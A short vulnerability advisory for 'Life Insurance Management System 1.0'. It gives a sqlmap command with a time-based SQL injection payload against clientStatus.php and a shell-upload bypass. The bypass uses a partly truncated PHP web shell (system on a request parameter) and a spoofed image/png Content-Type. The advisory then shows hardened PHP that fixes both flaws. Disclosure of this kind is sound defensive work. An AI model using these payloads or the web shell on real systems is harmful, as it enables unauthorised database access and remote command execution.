Life Insurance Management System 1.0 SQL Injection/Shell Upload
SQL Injection
Log in to the application
Go to clientStatus.php?client_id=
sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271"
Shell Upload
Log in to the application
Go to Clients, where you can add a new client or modify an existing one
Click the examination button and upload a test.php with the content:
“
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
Click Upload and intercept the request with Burp Suite
Change the content type to image/png
Go to the path
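
A hardened form of the two code paths these steps reach, as an added example that is not the application's own code. The `client` table, the `client_id` column, `UPLOAD_DIR` and both function names are assumptions.

```php
<?php
// Added example: names below are hypothetical, not taken from the application.
const UPLOAD_DIR = '/var/lims-uploads';  // assumed location outside the web root
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

/** Look up a client with client_id bound as a parameter, never concatenated. */
function client_status(mysqli $db, string $rawId): ?array
{
    // Digits only: "1511986129' and sleep(20) and '1'='1" is rejected here.
    if (!ctype_digit($rawId) || strlen($rawId) > 18) {
        return null;
    }
    // Assumed table and column names. The placeholder keeps the value out of
    // the SQL text even if the check above is ever loosened.
    $stmt = $db->prepare('SELECT * FROM client WHERE client_id = ?');
    $stmt->bind_param('s', $rawId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row ?: null;
}

/** Store an examination upload; returns the stored name, or null if rejected. */
function store_examination(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // $file['type'] is the Content-Type header sent by the client, which is
    // why rewriting it to image/png gets past a header check. It is ignored
    // here; the type is read from the file's bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        return null;
    }
    // Server-chosen name and extension: the client's "test.php" is never used,
    // so a file that passes the byte check still cannot be saved as .php.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}
```

Files stored this way should be served through a download script that sets the Content-Type itself, not from a directory where the web server executes PHP.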